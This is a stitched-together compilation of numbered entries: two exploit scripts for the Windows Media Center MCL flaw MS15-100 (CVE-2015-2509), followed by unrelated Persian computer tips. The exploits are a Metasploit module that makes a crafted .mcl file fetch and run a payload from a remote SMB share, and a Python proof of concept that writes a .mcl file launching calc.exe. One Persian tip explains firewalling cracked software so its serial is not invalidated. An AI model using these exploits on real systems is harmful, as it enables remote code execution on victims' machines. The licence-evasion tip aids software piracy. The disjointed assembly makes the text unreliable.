  21. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMB::Server::Share def initialize(info={}) super(update_info(info, 'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability", 'Description' => %q{ This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r', ], 'References' => [ ['CVE', '2015-2509'], ['MSB', 'MS15-100'] ], 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => 'false' }, 'Platform' => 'win', 'Targets' => [ ['Windows', {}], ], 'Privileged' => false, 'DisclosureDate' => "Sep 8 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']), OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe']) ], self.class) deregister_options('FILE_CONTENTS') end def generate_mcl %Q|<application run="#{unc}" />| end def primer self.file_contents = generate_payload_exe print_status("Malicious executable at #{unc}...") print_status("Creating '#{datastore['FILENAME']}' file ...") mcl = generate_mcl file_create(mcl) end end
  22. # Title: MS15-100 Windows Media Center Command Execution # Date : 11/09/2015 # Author: R-73eN # Software: Windows Media Center # Tested : Windows 7 Ultimate # CVE : 2015-2509 banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner command = "calc.exe" evil = '<application run="' + command + '"/>' f = open("Music.mcl","w") f.write(evil) f.close() print "\n[+] Music.mcl generated . . . [+]"
  23. اگر شما نیز از نرم افزارهای کرک شده استفاده می کنید و یا با سریال و پسورد نرم افزارهای خود را فعال کرده اید ، در برخی از نرم افزارها برای جلوگیری از باطل شدن سریال باید نرم افزار را به لیست فایروال خود برای جلوگیری از باطل شدن سریال اضافه نمایید. در این آموزش نحوه قرار دادن نرم افزارها را به لیست فایروال برای جلوگیری از دسترسی به اینترنت می دهید. در ابتدای آموزش خدمت شما عرض کنیم اگر شما از نسخه های اسکوریتی انتی ویروس ها استفاده می کنید شما باید نرم افزارها را در لیست فارویال خود انتی ویروس قرار دهید ولی اگر از نسخه آنتی ویروس استفاده می کنید قرار دادن در لیست فایرول ویندوز کفایت می کند. آموزش در ویندوزهای ۷ و ۸: ۱ – ابتدا به کنترل پنل ویندوز مراجعه کنید ، سپس روی Security And System کلیک کنید اکنون روی Firewall Windos کلیک نمایید. ۲- سپس از پنجره سمت چپ روی Setting Advanced کلیک نمایید
  24. همراه شما هستیم با یکی دیگر از آموزش های رایانه کمک در این پست قصد داریم تا به شما آموزش دهیم چطور به کامپیوتر خود فرمان دهید تا در یک ساعت خاص بطور خودکار روشن شود، برنامه های بسیار زیادی برای اینکار وجود دارد اما بهترین و آسان ترین راهی که مد نظرمان است انجام اینکار توسط محیط بایوس مادربرد است بنابراین شما میتوانید بدون دانلود برنامه ای اینکار را به سادگی انجام دهید آموزش روشن شدن خودکار کامپیوتر در ساعتی خاص برای اینکار ابتدا باید وارد محیط بایوس شوید بنابراین سیستم خود را ریستارت کنید و پس از نمایش اطالعات مادربرد کلید Delرا فشار دهید حاال روی Setup Management Power رفته و enter بزنید تا وارد این قسمت بعد شوید حال Alarm by Resume را روی حالت Enable قرار بدهید در آخر در قسمت Date روز را انتخاب کنید )باید به میالدی باشد( و در قسمت Time زمان روشن شدن را انتخاب نمایید
  25. شیخ شاهین

    Windows

    شاید به دالیل مختلف بخواهید تاریخ نصب ویندوز خود را بدانید، اما هرچه فکر میکنید این تاریخ را به یاد نمی آورید. شما با انجام یک ترفند ساده میتوانید این تاریخ را مشاهده کنید. در این مطلب آموزش پیدا کردن تاریخ نصب ویندوز را برای شما آماده کرده ایم. -1برنامه ران (R+Win (را اجرا کنید و عبارت cmd را بنویسید و OK کنید. -2در صفحه cmd عبارت systeminfo را بنویسید و اینتر بزنید. -3بعد از چند ثانیه CMD اطالعات سیستم را به شما نشان میدهد. در مقابل عبارت Date Install Original میتوانید تاریخ نصب ویندوز را مشاهده کنید.